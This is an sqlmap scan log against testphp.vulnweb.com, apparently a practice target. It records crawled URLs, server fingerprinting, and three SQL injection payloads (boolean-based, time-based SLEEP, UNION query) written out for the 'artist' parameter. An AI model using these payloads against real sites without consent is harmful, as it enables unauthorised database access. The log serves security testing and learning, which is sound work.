Scan Type: sqlmap
Target: http://testphp.vulnweb.com/ --crawl=2
Scan Date: 2024-12-16 18:45:37.199489

Results:
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.8.12#pip}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 18:45:32 /2024-12-16/

do you want to check for the existence of site's sitemap(.xml) [y/N] N
[18:45:32] [INFO] starting crawler for target URL 'http://testphp.vulnweb.com/'
[18:45:32] [INFO] searching for links with depth 1
[18:45:32] [INFO] searching for links with depth 2
please enter number of threads? [Enter for 1 (current)] 1
[18:45:32] [WARNING] running in a single-thread mode. This could take a while
got a 302 redirect to 'http://testphp.vulnweb.com/login.php'. Do you want to follow? [Y/n] Y
do you want to normalize crawling results [Y/n] Y
do you want to store crawling results to a temporary file for eventual further processing with other tools [y/N] N
[18:45:36] [INFO] found a total of 5 targets
[1/5] URL:
GET http://testphp.vulnweb.com/artists.php?artist=1
do you want to test this URL? [Y/n/q]
> Y
[18:45:36] [INFO] testing URL 'http://testphp.vulnweb.com/artists.php?artist=1'
[18:45:36] [INFO] resuming back-end DBMS 'mysql' 
[18:45:36] [INFO] using 'C:\Users\omarz\AppData\Local\sqlmap\output\results-12162024_0645pm.csv' as the CSV results file in multiple targets mode
[18:45:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: artist (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: artist=1 AND 7530=7530

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: artist=1 AND (SELECT 1757 FROM (SELECT(SLEEP(5)))XJzl)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: artist=-2091 UNION ALL SELECT CONCAT(0x7178626271,0x454562566464694a614c7368566f6e4669766163704471585771465758615a736d52666866414a76,0x7171626271),NULL,NULL-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[18:45:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.19.0, PHP 5.6.40
back-end DBMS: MySQL >= 5.0.12
SQL injection vulnerability has already been detected against 'testphp.vulnweb.com'. Do you want to skip further tests involving it? [Y/n] Y
[18:45:37] [INFO] skipping 'http://testphp.vulnweb.com/comment.php?aid=1'
[18:45:37] [INFO] skipping 'http://testphp.vulnweb.com/listproducts.php?cat=1'
[18:45:37] [INFO] skipping 'http://testphp.vulnweb.com/hpp/?pp=12'
[18:45:37] [INFO] skipping 'http://testphp.vulnweb.com/showimage.php?file='
[18:45:37] [INFO] you can find results of scanning in multiple targets mode inside the CSV file 'C:\Users\omarz\AppData\Local\sqlmap\output\results-12162024_0645pm.csv'

[*] ending @ 18:45:37 /2024-12-16/

